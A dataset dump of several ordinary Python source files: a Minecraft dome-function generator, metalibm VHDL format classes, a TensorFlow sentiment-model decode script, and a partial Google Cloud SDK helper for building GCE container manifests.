text stringlengths 957 885k |
|---|
import os
import numpy as np
import functools
from . import dpath, chunks, resolve_symbols, namespace_dir, group_blocks_into_fills, write_fill
def check_bounds(voxels):
    """Compute and print the axis-aligned bounds of a list of voxels.

    :param voxels: iterable of (x, y, z) integer triples
    :return: tuple (min_x, max_x, min_y, max_y, min_z, max_z); all zeros
        for an empty input (matching the previous behaviour)
    """
    iterator = iter(voxels)
    try:
        first_x, first_y, first_z = next(iterator)
    except StopIteration:
        # keep the historical fallback for an empty input
        bounds = (0, 0, 0, 0, 0, 0)
        print(bounds)
        return bounds
    # BUG FIX: seed the reduction from the first voxel instead of zeros —
    # zero seeding skewed the bounds whenever every coordinate was
    # strictly positive or strictly negative
    bounds = (first_x, first_x, first_y, first_y, first_z, first_z)
    for x, y, z in iterator:
        bounds = (
            min(bounds[0], x), max(bounds[1], x),
            min(bounds[2], y), max(bounds[3], y),
            min(bounds[4], z), max(bounds[5], z),
        )
    print(bounds)
    # BUG FIX: the original computed the bounds but never returned them
    return bounds
def generate(settings):
    """
    Generates functions that create domes,
    one for each combination of `radiuses` and `blocks_and_tags`.

    :param settings: configuration tree queried through dpath
    """
    namespace = namespace_dir(settings)
    # minecraft functions can only hold a limited number of commands
    max_commands = dpath.get(settings, '/max_commands')
    print('Generating multiple points')
    radiuses = dpath.get(settings, '/radiuses')
    # Generate multiple points on the dome with based on the largest radius.
    step = 0.5 / max(radiuses)
    points = [
        (
            np.sin(azimuth) * np.cos(elevation),
            np.sin(elevation),
            np.cos(azimuth) * np.cos(elevation),
        )
        # full circle
        for azimuth in np.arange(-np.pi, np.pi, step)
        # from just below the ground to the apex
        for elevation in np.arange(-np.pi/4, np.pi/2, step)
    ]
    def create_dome_fills(radius):
        """
        Closure on `points` that creates a list of fills for a dome with a given radius.
        """
        print(f'preparing dome: {radius}')
        # convert `points` to `voxels` and remove duplicates
        voxels = (np.array(points) * radius).astype(np.int16)
        # remove duplicates
        unique_voxels = {(x, y, z) for x, y, z in voxels}
        # group blocks into fills
        print(f'grouping dome: {radius}')
        blocks = []
        min_x, min_y, min_z = (0, 0, 0)
        max_x, max_y, max_z = (0, 0, 0)
        for x, y, z in unique_voxels:
            min_x = min(min_x, x)
            min_y = min(min_y, y)
            min_z = min(min_z, z)
            max_x = max(max_x, x + 1)
            max_y = max(max_y, y + 1)
            max_z = max(max_z, z + 1)
            blocks.append((x, y, z, True))
        return group_blocks_into_fills(
            blocks, (max_x, max_y, max_z), (min_x, min_y, min_z)
        )
    def write_dome_function(radius, block, tag, fills):
        """
        Closure that creates a dome function from a list of fills for given radius and block.
        """
        # minecraft functions can only execute MAX_COMMANDS commands,
        # so we may have to split functions
        for i, fills_chunk in enumerate(chunks(fills, max_commands)):
            # BUG FIX: the original rebound `tag` cumulatively across chunks
            # (producing tag, tag_1, tag_1_2, ...); derive every chunk's
            # file tag from the base tag instead
            chunk_tag = tag if i == 0 else f'{tag}_{i}'
            file_name = os.path.join(namespace, f'{radius}_{chunk_tag}.mcfunction')
            print(f'writing {file_name}')
            with open(file_name, 'w') as file:
                for min_voxel, max_voxel, _ in fills_chunk:
                    write_fill(file, min_voxel, max_voxel, block)
    # create a dome function for each combination of `radiuses` and `blocks_and_tags`
    blocks_and_tags = [
        (resolve_symbols(settings, block), tag)
        for block, tag in dpath.get(settings, '/blocks_and_tags')
    ]
    for radius in radiuses:
        # fills are radius-specific but shared across all block/tag pairs
        fills = create_dome_fills(radius)
        for block, tag in blocks_and_tags:
            write_dome_function(radius, block, tag, fills)
|
# -*- coding: utf-8 -*-
""" HDL description specific formats (for RTL and signals) """
###############################################################################
# This file is part of metalibm (https://github.com/kalray/metalibm)
###############################################################################
# MIT License
#
# Copyright (c) 2018 Kalray
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
###############################################################################
###############################################################################
# created: Nov 20th, 2016
# last-modified: Mar 8th, 2018
#
# author(s): <NAME> (<EMAIL>)
# description: Declaration of Node formats for hardware designs
###############################################################################
import sollya
from .ml_formats import (
ML_Format, ML_Base_FixedPoint_Format, ML_Fixed_Format,
VirtualFormat, get_virtual_cst,
ML_StringClass, DisplayFormat,
)
from ..code_generation.code_constant import VHDL_Code, C_Code
from .ml_operations import ML_Operation
from ..utility.log_report import Log
## Helper constant: 2 as a sollya object
S2 = sollya.SollyaObject(2)
class StdLogicDirection:
    """Namespace gathering the two possible index orderings of an HDL bit vector."""
    class Downwards:
        """Descending range, most significant index first (e.g. "7 downto 0")."""
        @staticmethod
        def get_descriptor(low, high):
            # VHDL descending range descriptor
            return "%s downto %s" % (high, low)
    class Upwards:
        """Ascending range, least significant index first (e.g. "0 to 7")."""
        @staticmethod
        def get_descriptor(low, high):
            # VHDL ascending range descriptor
            return "%s to %s" % (low, high)
## Computes the negation of the positive @p value on
# @p size bits
# Fails if value exceeds the largest representable
# number of @p size - 1 bits
def get_2scomplement_neg(value, size):
    """Return the 2's-complement negation of the positive ``value`` intended
    to fit on ``size`` bits (on unbounded Python ints, ``~value + 1 == -value``).

    NOTE(review): the assert bound looks off by one — a magnitude of exactly
    2**(size-1) - 1 is representable on size-1 bits yet is rejected here;
    confirm intent before changing.
    """
    value = int(abs(value))
    assert value < (S2**(size-1) - 1)
    # bitwise complement plus one == arithmetic negation for Python ints
    return (~value+1)
def generic_get_vhdl_cst(value, bit_size, is_std_logic=False):
    """Return a VHDL literal string encoding @p value on @p bit_size bits.

    The value is wrapped into the unsigned range [0, 2**bit_size - 1] and
    rendered as a bit literal ('0'/'1'), a hexadecimal vector literal
    (X"...") when the width is a nibble multiple, or a binary vector
    literal ("...") otherwise.

    :param value: constant value to encode (anything accepted by int())
    :param bit_size: width of the literal in bits (must be > 0)
    :param is_std_logic: indicates whether or not fixed-point support format
        is a single-bit std_logic (rather than std_logic_vector) which implies
        particular value string generation
    :type is_std_logic: bool
    """
    try:
        value = int(value)
        # wrap into the unsigned bit_size range (also maps negatives)
        value &= int(2**bit_size - 1)
    except TypeError:
        Log.report(Log.Error, "unsupported value={}/bit_size={} in generic_get_vhdl_cst".format(value, bit_size), error=TypeError)
    assert bit_size > 0
    assert value <= (2**bit_size - 1)
    if is_std_logic:
        # BUG FIX: the original `assert bit_size == 1` fired before this
        # check, making the error report unreachable; the message is now
        # actually interpolated via str.format as well
        if bit_size != 1:
            Log.report(Log.Error, "bit_size must be 1 (not {}) for generic_get_vhdl_cst is_std_logic=True)".format(bit_size))
        return "'%s'" % bin(value)[2:].replace("L","")
    elif bit_size % 4 == 0:
        # nibble-aligned width: hexadecimal vector literal
        return "X\"%s\"" % hex(value)[2:].replace("L","").zfill(bit_size // 4)
    else:
        # generic width: binary vector literal
        return "\"%s\"" % bin(value)[2:].replace("L","").zfill(bit_size)
class ML_UnevaluatedFormat:
    """Virtual base class for formats whose parameters may remain partially
    unevaluated at declaration time; concrete parameter values are produced
    later through evaluate()."""
    def evaluate(self, node_value_solver):
        """Compute final values for node parameters and return a fully
        evaluated format (must be overridden by concrete sub-classes)."""
        raise NotImplementedError
    def get_c_cst(self, cst_value):
        # C constants cannot be produced before the format is evaluated
        Log.report(Log.Error, "unevaluated format can not be used for get_c_cst")
        raise NotImplementedError
class UndefinedFixedPointFormat(ML_Base_FixedPoint_Format, ML_UnevaluatedFormat):
    """Fixed-point format whose integer and fractional sizes have not been
    determined yet: both may still be unevaluated expressions, resolved later
    through evaluate()."""
    def __init__(self, integer_size, frac_size, signed=True, support_format=None, align=0):
        ML_Base_FixedPoint_Format.__init__(
            self, integer_size, frac_size, signed,
            support_format=support_format, align=align)
        self.name[VHDL_Code] = "unevaluated_fixed_point"
    def evaluate(self, node_value_solver):
        """Resolve both sizes through @p node_value_solver and build the
        corresponding concrete fixed-point format."""
        resolved_int = node_value_solver(self.integer_size)
        resolved_frac = node_value_solver(self.frac_size)
        return fixed_point(resolved_int, resolved_frac,
                           signed=self.signed,
                           support_format=self.support_format)
    def get_c_cst(self, cst_value):
        # delegates to the unevaluated-format error path
        return ML_UnevaluatedFormat.get_c_cst(self, cst_value)
    def __str__(self):
        return "FS<undef>" if self.signed else "FU<undef>"
class RTL_FixedPointFormat(ML_Base_FixedPoint_Format):
    """Concrete RTL fixed-point format with fully evaluated sizes; constants
    and type names are delegated to the std_logic(_vector) support format."""
    def __init__(self, integer_size, frac_size, signed = True, support_format = None, align = 0):
        ML_Base_FixedPoint_Format.__init__(self, integer_size, frac_size, signed, support_format = support_format, align = align)
        # VHDL-facing name, e.g. "INT8" / "UINT8"
        name = ("" if self.signed else "U") + "INT" + str(self.get_bit_size())
        self.name[VHDL_Code] = name
    def get_vhdl_cst(self, cst_value):
        # scale by 2**frac_size to obtain the integer encoding of the constant
        is_std_logic = (self.support_format == ML_StdLogic)
        return generic_get_vhdl_cst(cst_value * S2**self.get_frac_size(), self.get_bit_size(), is_std_logic=is_std_logic)
    def get_name(self, language = VHDL_Code):
        # type name comes from the support format (std_logic / std_logic_vector)
        return self.support_format.get_name(language)
    def get_code_name(self, language = VHDL_Code):
        return self.support_format.get_code_name(language)
    def is_cst_decl_required(self):
        # constants can be inlined, no separate declaration required
        return False
    def get_cst(self, cst_value, language = VHDL_Code):
        # only VHDL constant generation is supported for this format
        if language is VHDL_Code:
            return self.get_vhdl_cst(cst_value)
        else:
            raise NotImplementedError
    def __eq__(self, other_format):
        # structural equality on sizes, signedness and support format
        # NOTE(review): defining __eq__ without __hash__ makes instances
        # unhashable in Python 3 unless a base class restores it — confirm
        if not isinstance(other_format, self.__class__):
            return False
        else:
            return self.integer_size == other_format.integer_size and \
                   self.frac_size == other_format.frac_size and \
                   self.support_format == other_format.support_format and \
                   self.signed == other_format.signed
    @staticmethod
    def parse_from_match(format_match):
        """ Parse the description of a class format and generates
            the format object """
        assert not format_match is None
        # expects named groups "name" ("FS"/"FU"), "integer" and "frac"
        name = format_match.group("name")
        int_size = int(format_match.group("integer"))
        frac_size = int(format_match.group("frac"))
        is_signed = (name == "FS")
        return fixed_point(int_size, frac_size, signed=is_signed)
def HdlVirtualFormat(base_precision):
    """ Build a VirtualFormat to wrap @p base_precision """
    # support is a raw std_logic_vector wide enough for the base precision
    support = ML_StdLogicVectorFormat(base_precision.get_bit_size())
    return VirtualFormat(
        base_format=base_precision,
        support_format=support,
        get_cst=get_virtual_cst
    )
def RawLogicVectorFormat(bit_size, offset=0, direction=StdLogicDirection.Downwards):
    """ build a low-level digital vector format """
    # operation-valued parameters mean the size is not known yet:
    # fall back to the unevaluated variant
    unresolved = isinstance(bit_size, ML_Operation) or isinstance(offset, ML_Operation)
    if unresolved:
        return UnevaluatedStdLogicVectorFormat(bit_size, offset, direction)
    return ML_StdLogicVectorFormat(bit_size, offset=offset, direction=direction)
class HDL_LowLevelFormat(ML_Format):
    """ Format class for multiple bit signals """
    # VHDL type-name prefix; overridden by concrete sub-classes
    format_prefix = "undefined_prefix"
    def __init__(self, bit_size, offset=0, direction=StdLogicDirection.Downwards):
        # :param bit_size: vector width in bits
        # :param offset: index of the lowest bit
        # :param direction: StdLogicDirection.Downwards / Upwards ordering
        ML_Format.__init__(self)
        self.bit_size = bit_size
        self.name[VHDL_Code] = "{format_prefix}({direction_descriptor})".format(
            format_prefix=self.format_prefix,
            direction_descriptor = direction.get_descriptor(offset, offset + self.bit_size - 1))
        self.direction = direction
        self.offset = offset
        self.display_format[VHDL_Code] = "%s"
    def __str__(self):
        return self.name[VHDL_Code]
    def __repr__(self):
        return self.name[VHDL_Code]
    def get_name(self, language=VHDL_Code):
        # None defaults to the VHDL name
        language = VHDL_Code if language is None else language
        return self.name[language]
    def get_code_name(self, language=VHDL_Code):
        return self.get_name(language)
    def get_cst(self, cst_value, language = VHDL_Code):
        if language is VHDL_Code:
            return self.get_vhdl_cst(cst_value)
        else:
            # default case
            return self.get_vhdl_cst(cst_value)
    def get_bit_size(self):
        return self.bit_size
    def get_integer_coding(self, value, language = VHDL_Code):
        return int(value)
    def get_vhdl_cst(self, value):
        # delegate literal generation to the shared helper
        return generic_get_vhdl_cst(value, self.bit_size)
    def is_cst_decl_required(self):
        return False
    def __eq__(self, format2):
        # NOTE(review): compares against ML_StdLogicVectorFormat (a
        # sub-class) rather than HDL_LowLevelFormat, so two equal
        # HDL_UnsignedVectorFormat instances compare unequal — confirm intent
        return isinstance(format2, ML_StdLogicVectorFormat) and self.bit_size == format2.bit_size and self.offset == format2.offset
    def __hash__(self):
        return ML_Format.__hash__(self)
## Format class for multiple bit signals
class ML_StdLogicVectorFormat(HDL_LowLevelFormat):
    """ classic std_logic_vector format """
    format_prefix = "std_logic_vector"
    # sizes/offset are fully evaluated integers
    resolved = True
    def __init__(self, bit_size, offset=0, direction=StdLogicDirection.Downwards):
        # an empty (or negative-width) vector is not representable
        assert bit_size > 0
        HDL_LowLevelFormat.__init__(self, int(bit_size), int(offset), direction)
class UnevaluatedStdLogicVectorFormat(HDL_LowLevelFormat, ML_UnevaluatedFormat):
    """std_logic_vector format whose size and/or offset may still be
    unevaluated expressions."""
    format_prefix = "unevaluated_std_logic_vector"
    resolved = False
    def evaluate(self, node_value_solver):
        """Resolve size and offset through @p node_value_solver and return
        the concrete ML_StdLogicVectorFormat."""
        resolved_size = node_value_solver(self.bit_size)
        resolved_offset = node_value_solver(self.offset)
        return ML_StdLogicVectorFormat(resolved_size, resolved_offset, direction=self.direction)
class HDL_NumericVectorFormat(HDL_LowLevelFormat):
    """ common base for numeric (signed / unsigned) vector formats """
    pass
class HDL_UnsignedVectorFormat(HDL_NumericVectorFormat):
    """ std_logic_arith unsigned format """
    format_prefix = "unsigned"
class HDL_SignedVectorFormat(HDL_NumericVectorFormat):
    """ std_logic_arith signed format """
    format_prefix = "signed"
## Class of single bit value format
class ML_StdLogicClass(ML_Format):
    """ class of single bit value signals """
    def __init__(self):
        ML_Format.__init__(self)
        # width is fixed to a single bit
        self.bit_size = 1
        self.name[VHDL_Code] = "std_logic"
        self.display_format[VHDL_Code] = "%s"
    def __str__(self):
        return self.name[VHDL_Code]
    def get_name(self, language = VHDL_Code):
        return self.name[language]
    def get_cst(self, value, language = VHDL_Code):
        # single-bit literal, e.g. '0' / '1'
        return "'%d'" % value
    def get_bit_size(self):
        return self.bit_size
    def get_support_format(self):
        # std_logic is its own support format
        return self
    def get_integer_coding(self, value, language=VHDL_Code):
        return int(value)
## std_logic type singleton
ML_StdLogic = ML_StdLogicClass()
## Helper to build RTL fixed-point formats
def fixed_point(int_size, frac_size, signed = True, support_format = None):
    """ Generate a fixed-point format """
    # default support: a raw std_logic_vector wide enough for all bits
    chosen_support = support_format or ML_StdLogicVectorFormat(int_size + frac_size)
    return RTL_FixedPointFormat(
        int_size, frac_size,
        signed=signed,
        support_format=chosen_support
    )
def lazy_fixed_point(int_size, frac_size, signed=True, support_format=None):
    """ Generate a lazy fixed-point format with unevaluated integer and fractionnal sizes """
    # sizes may be unevaluated expressions, resolved later via evaluate()
    return UndefinedFixedPointFormat(
        int_size, frac_size,
        signed=signed,
        support_format=support_format)
## Test whether @p precision is a fixed-point format
# @return boolean value
def is_fixed_point(precision):
    """Return True when @p precision is (a subclass of) a fixed-point format."""
    return isinstance(precision, ML_Base_FixedPoint_Format)
def is_unevaluated_format(precision):
    """Return True when @p precision still carries unevaluated parameters."""
    return isinstance(precision, ML_UnevaluatedFormat)
def get_unsigned_precision(precision):
    """ convert a sign agnostic precision (std_logic_vector)
        to its unsigned counterpart (same size, same offset, same
        direction) """
    if isinstance(precision, HDL_UnsignedVectorFormat):
        # already unsigned: nothing to convert
        return precision
    if isinstance(precision, ML_StdLogicVectorFormat):
        return HDL_UnsignedVectorFormat(
            precision.bit_size, precision.offset, precision.direction)
    raise NotImplementedError
def get_signed_precision(precision):
    """ convert a sign agnostic precision (std_logic_vector)
        to its signed counterpart (same size, same offset, same
        direction) """
    if isinstance(precision, HDL_SignedVectorFormat):
        # already signed: nothing to convert
        return precision
    if isinstance(precision, ML_StdLogicVectorFormat):
        return HDL_SignedVectorFormat(
            precision.bit_size, precision.offset, precision.direction)
    raise NotImplementedError
def get_numeric_precision(precision, is_signed):
    """ convert a sign agnostic precision (std_logic_vector)
        to its signed/unsigned counterpart (same size, same offset, same
        direction) """
    convert = get_signed_precision if is_signed else get_unsigned_precision
    return convert(precision)
## HDL string pseudo-formats for file I/O support
# VHDL `file` object type (constants rendered quoted)
HDL_FILE = ML_StringClass("file", DisplayFormat("%s"), lambda self, s: "\"{}\"".format(s))
# VHDL `line` type as used by std.textio (constants rendered quoted)
HDL_LINE = ML_StringClass("line", DisplayFormat("%s"), lambda self, s: "\"{}\"".format(s))
# VHDL file_open_status enumeration (constants rendered unquoted)
HDL_OPEN_FILE_STATUS = ML_StringClass("file_open_status", DisplayFormat("%s"), lambda self, s: "{}".format(s))
# file_open_status constants use the same rendering in VHDL as in C
HDL_OPEN_FILE_STATUS.get_cst_map[VHDL_Code] = HDL_OPEN_FILE_STATUS.get_cst_map[C_Code]
|
<reponame>coldenheart/123<filename>python/contrib/SentimentAnalysis/models/test.py
"""coding=utf-8
Copyright 2020 Huawei Technologies Co., Ltd
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
============================================================================
"""
import argparse
import datetime
import os
import pickle
import random
import sys

import numpy
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import gfile

from handle_data import dataLoader, CreatVocab
# from handle_data.CreatVocab import *
from handle_data.CreatVocab import graph_util
from handle_data.batch_iter import create_batch_iter, pair_data_variable
from model.lstm import Lstm
from driver.Config import Configurable
from bert.pretrain import modeling, tokenization
def train(train_data, dev_data, vocab, config,
          bert_config_):
    """Build a session and decode `dev_data` with the frozen model.

    NOTE(review): despite its name this function currently only decodes —
    it returns unconditionally after decode(); the training loop kept below
    the `return 0` is dead code retained from the original script.

    :param train_data: training batches (unused in the decode-only flow)
    :param dev_data: data to decode
    :param vocab: (src_vocab, tgt_vocab) pair
    :param config: Configurable instance
    :param bert_config_: BERT configuration (currently unused)
    :return: 0 on success
    """
    src_vocab, tgt_vocab = vocab
    print('init model')
    model = None
    print('start training...')
    use_cuda = False
    if config.use_cuda:
        use_cuda = True
    # saver = tf.train.Saver()
    with tf.Session(config=tf.ConfigProto(
            log_device_placement=use_cuda)) as sess:
        if config.load_model:
            a = 0
        else:
            sess.run(tf.global_variables_initializer())
        # if config.decode:
        # BUG FIX: decode() takes 5 parameters; the extra bert_config_
        # argument previously passed here raised a TypeError at call time
        decode(model, sess, dev_data, vocab, config)
        print('decode successful!')
        return 0
        # ---- dead code below: never reached (kept from original) ----
        writer = tf.summary.FileWriter("logs1/", sess.graph)
        evaluate(model, -1, sess, dev_data, vocab, config)
        for i in range(config.epochs):
            step = 1
            train_batch_iter = create_batch_iter(train_data,
                                                 config.batch_size,
                                                 shuffle=True)
            for batch in train_batch_iter:
                feature, target, word_list = pair_data_variable(
                    batch, src_vocab, tgt_vocab, config)
                sess.run(model.train_op,
                         feed_dict={
                             model.w: feature,
                             model.gold: target
                         })
                if step % config.test_interval == 0:
                    loss, acc = sess.run([model.loss_op, model.accuracy],
                                         feed_dict={
                                             model.w: feature,
                                             model.gold: target
                                         })
                    accuracy = acc / len(target) * 100
                    time_str = datetime.datetime.now().isoformat()
                    print('epoch:{} step:{}|{} acc={:.2f}% loss={:.5f}'.format(
                        i, step, time_str, accuracy, loss))
                step += 1
            evaluate(model, i, sess, dev_data, vocab, config)
def decode(model, sess, dev_data, vocab, config):
    """Load the frozen graph and decode `dev_data`, collecting predictions.

    :param model: Lstm wrapper or None (the frozen graph is used directly)
    :param sess: outer tf.Session (NOTE: rebound below to a fresh session,
        mirroring the original behaviour)
    :param dev_data: batches to decode
    :param vocab: (src_vocab, tgt_vocab) pair
    :param config: Configurable instance with save/decode paths
    """
    src_vocab, tgt_vocab = vocab
    # load the frozen (constant-folded) model
    print('existed model path is : ' + config.save_dirs + '/' +
          config.save_model_path)
    graph_def = tf.GraphDef()
    with open(config.save_dirs + '/' + config.save_model_path, 'rb') as f:
        graph_def.ParseFromString(f.read())
        sess.graph.as_default()
        tf.import_graph_def(graph_def, name='')
    sess = tf.Session()
    sess.run(tf.global_variables_initializer())
    _w = sess.graph.get_tensor_by_name('w:0')
    # _gold = sess.graph.get_tensor_by_name('gold:0')
    # BUG FIX: keep the fetch tensor and the fetched values under distinct
    # names — previously `logits` was overwritten by the first sess.run()
    # result, so the second batch passed an ndarray as the fetch and crashed
    logits_op = sess.graph.get_tensor_by_name('s/logits:0')
    if model is not None:
        # BUG FIX: train() passes model=None; the unconditional attribute
        # write previously raised AttributeError
        model.dropout = 0
    w = []
    pre = []
    print('start decode...')
    train_batch_iter = create_batch_iter(dev_data,
                                         config.batch_size,
                                         shuffle=True)
    print("config.decode_path: ", config.decode_path)
    with open(config.decode_path, 'w', encoding='utf8') as f:
        for batch in train_batch_iter:
            feature, target, word_list = pair_data_variable(
                batch, src_vocab, tgt_vocab, config)
            logits_val = sess.run(
                logits_op,
                feed_dict={_w: feature
                           # _gold: target
                           })
            print("feature: ", feature)
            print("---------------------------------------------------")
            print("target: ", target)
            print("---------------------------------------------------")
            print("logits ", logits_val)
            print("---------------------------------------------------")
            # class with the highest logit per example
            predicts = np.argmax(logits_val, axis=1).tolist()
            print("predicts ", predicts)
            for id_, index in enumerate(predicts):
                pre.append(predicts[id_])
                w.append(word_list[id_])
def evaluate(model, epoch, sess, dev_data, vocab, config):
    """Evaluate `model` on `dev_data`; freeze and save the graph on a new best.

    Updates the module-level `best_acc` / `best_epoch` trackers.

    BUG FIX: the original copied `best_acc` into a local `_best_acc` (so the
    best score never persisted across calls) and referenced `_best_epoch`
    on the not-improved branch where it was never assigned (NameError).
    """
    global best_acc, best_epoch
    src_vocab, tgt_vocab = vocab
    print('start evaluate...')
    total_acc = 0
    gold_num = 0
    if model is not None:
        # disable dropout during evaluation
        model.dropout = 0
    train_batch_iter = create_batch_iter(dev_data,
                                         config.batch_size,
                                         shuffle=True)
    for batch in train_batch_iter:
        feature, target, word_list = pair_data_variable(
            batch, src_vocab, tgt_vocab, config)
        gold_num += len(target)
        loss, acc = sess.run([model.loss_op, model.accuracy],
                             feed_dict={
                                 model.w: feature,
                                 model.gold: target
                             })
        total_acc += acc
    accuracy = total_acc / gold_num * 100
    print('acc={:.2f}%'.format(accuracy))
    if accuracy > best_acc:
        best_acc = accuracy
        best_epoch = epoch
        print('##Update! best_acc={:.2f}% in epoch {}'.format(
            best_acc, best_epoch))
        # freeze variables into constants and persist the graph
        output_graph_def = graph_util.convert_variables_to_constants(
            sess, sess.graph_def, output_node_names=['s/logits'])
        with tf.gfile.GFile(config.save_dirs + '/' + config.save_model_path,
                            mode='wb') as f:
            f.write(output_graph_def.SerializeToString())
        print('saved model successfully! in ' + config.save_dirs + '/' +
              config.save_model_path)
    else:
        print('not update, best_acc={:.2f}% in epoch {}'.format(
            best_acc, best_epoch))
if __name__ == '__main__':
    # seed every RNG for reproducible decoding
    random.seed(233)
    np.random.seed(233)
    tf.set_random_seed(233)
    # parameters
    parse = argparse.ArgumentParser()
    parse.add_argument('--config_file', type=str, default='default.ini')
    parse.add_argument('--thread', type=int, default=1)
    parse.add_argument('--use_cuda', action='store_true', default=False)
    parse.add_argument('-bert_config_file',
                       type=str,
                       default=os.path.join('chinese_L-12_H-768_A-12',
                                            'bert_config.json'))
    parse.add_argument('-vocab_file',
                       type=str,
                       default=os.path.join('chinese_L-12_H-768_A-12',
                                            'vocab.txt'),
                       help='bert_vocab')
    parse.add_argument(
        '-max_seq_length',
        type=int,
        default=202,
        help=
        'The maximum total input sequence length after WordPiece tokenization.'
    )
    parse.add_argument(
        '-warmup_proportion',
        type=float,
        default=0.1,
        help='Proportion of training to perform linear learning rate warmup for '
        'E.g., 0.1 = 10% of training.')
    parse.add_argument('-do_lower_case',
                       type=bool,
                       default=True,
                       help='Whether to lower case the input text.')
    args, extra_args = parse.parse_known_args()
    config_ = Configurable(args.config_file, extra_args)
    bert_config = modeling.BertConfig.from_json_file(args.bert_config_file)
    if args.max_seq_length > bert_config.max_position_embeddings:
        raise ValueError(
            "Cannot use sequence length %d because the BERT model "
            "was only trained up to sequence length %d" %
            (args.max_seq_length, bert_config.max_position_embeddings))
    tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file,
                                           do_lower_case=args.do_lower_case)
    print("this is decode --------------")
    path = './data/test.txt'
    dev_data_, sentence_length = dataLoader.decoder_sentence(path)
    print(config_.save_dirs + '/' + config_.word_path)
    with open(config_.save_dirs + '/' + config_.word_path, 'rb') as f_:
        src_vocab_ = pickle.load(f_)
    with open(config_.save_dirs + '/' + config_.label_path, 'rb') as f_:
        tgt_vocab_ = pickle.load(f_)
    best_acc = 0
    best_epoch = 0
    # BUG FIX: train() takes 5 positional parameters; the stray
    # `tgt_vocab_.size` argument previously made this call raise TypeError
    train("", dev_data_, (src_vocab_, tgt_vocab_), config_,
          bert_config)
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for creating GCE container (Docker) deployments."""
import json
import re
import shlex
from googlecloudsdk.api_lib.compute import file_utils
from googlecloudsdk.api_lib.compute import metadata_utils
from googlecloudsdk.calliope import exceptions
# cloud-init user-data template: starts kubelet pointed at the
# google-container-manifest metadata entry (%s <- allow-privileged flag)
USER_INIT_TEMPLATE = """#cloud-config
runcmd:
- ['/usr/bin/kubelet',
'--allow-privileged=%s',
'--manifest-url=http://metadata.google.internal/computeMetadata/v1/instance/attributes/google-container-manifest',
'--manifest-url-header=Metadata-Flavor:Google',
'--config=/etc/kubernetes/manifests']
"""
# metadata keys reserved for container deployment (users may not set them)
USER_DATA_KEY = 'user-data'
CONTAINER_MANIFEST_KEY = 'google-container-manifest'
# protocols accepted in --port-mappings
ALLOWED_PROTOCOLS = ['TCP', 'UDP']
def _GetUserInit(allow_privileged):
  """Gets user-init metadata value for GCI image."""
  # render the boolean as the lowercase string kubelet expects
  flag = 'true' if allow_privileged else 'false'
  return USER_INIT_TEMPLATE % (flag)
def _GetContainerManifest(
    name, container_manifest, docker_image, port_mappings, run_command,
    run_as_privileged):
  """Loads container manifest from file or creates a new one."""
  # no user-supplied manifest: synthesize one from the flags
  if not container_manifest:
    return CreateContainerManifest(name, docker_image, port_mappings,
                                   run_command, run_as_privileged)
  return file_utils.ReadFile(container_manifest, 'container manifest')
class InvalidMetadataKeyException(exceptions.ToolException):
  """Raised for metadata keys that are reserved for container deployment."""
  def __init__(self, metadata_key):
    message = ('Metadata key "{0}" is not allowed when running contenerized VM.'
               .format(metadata_key))
    super(InvalidMetadataKeyException, self).__init__(message)
def CreateContainerManifest(
    name, docker_image, port_mappings, run_command, run_as_privileged):
  """Create container deployment manifest.

  Args:
    name: pod and container name.
    docker_image: Docker image to run.
    port_mappings: optional list of 'PORT:TARGET_PORT:PROTOCOL' strings.
    run_command: optional shell-like command string for the container.
    run_as_privileged: whether to request a privileged securityContext.

  Returns:
    JSON string holding the Kubernetes pod manifest.

  Raises:
    InvalidArgumentException: on malformed port mappings or run command.
  """
  container = {
      'name': name,
      'image': docker_image,
      'imagePullPolicy': 'Always'
  }
  if port_mappings:
    container['ports'] = _ValidateAndParsePortMapping(port_mappings)
  if run_command:
    try:
      container['command'] = shlex.split(run_command)
    except ValueError as e:
      raise exceptions.InvalidArgumentException('--run-command', str(e))
  if run_as_privileged:
    container['securityContext'] = {'privileged': True}
  config = {
      'apiVersion': 'v1',
      'kind': 'Pod',
      'metadata': {'name': name},
      'spec': {'containers': [container]}
  }
  return json.dumps(config, indent=2, sort_keys=True)
def ValidateUserMetadata(metadata):
  """Validates user-specified metadata.

  Checks that it contains no keys which conflict with container deployment.

  Args:
    metadata: user-specified VM metadata.

  Raises:
    InvalidMetadataKeyException: if there is conflict with user-provided
        metadata
  """
  reserved_keys = (USER_DATA_KEY, CONTAINER_MANIFEST_KEY)
  for entry in metadata.items:
    if entry.key in reserved_keys:
      raise InvalidMetadataKeyException(entry.key)
def CreateMetadataMessage(
    messages, run_as_privileged, container_manifest, docker_image,
    port_mappings, run_command, user_metadata, name):
  """Create metadata message with parameters for running Docker."""
  # reserved entries: kubelet bootstrap config and the pod manifest itself
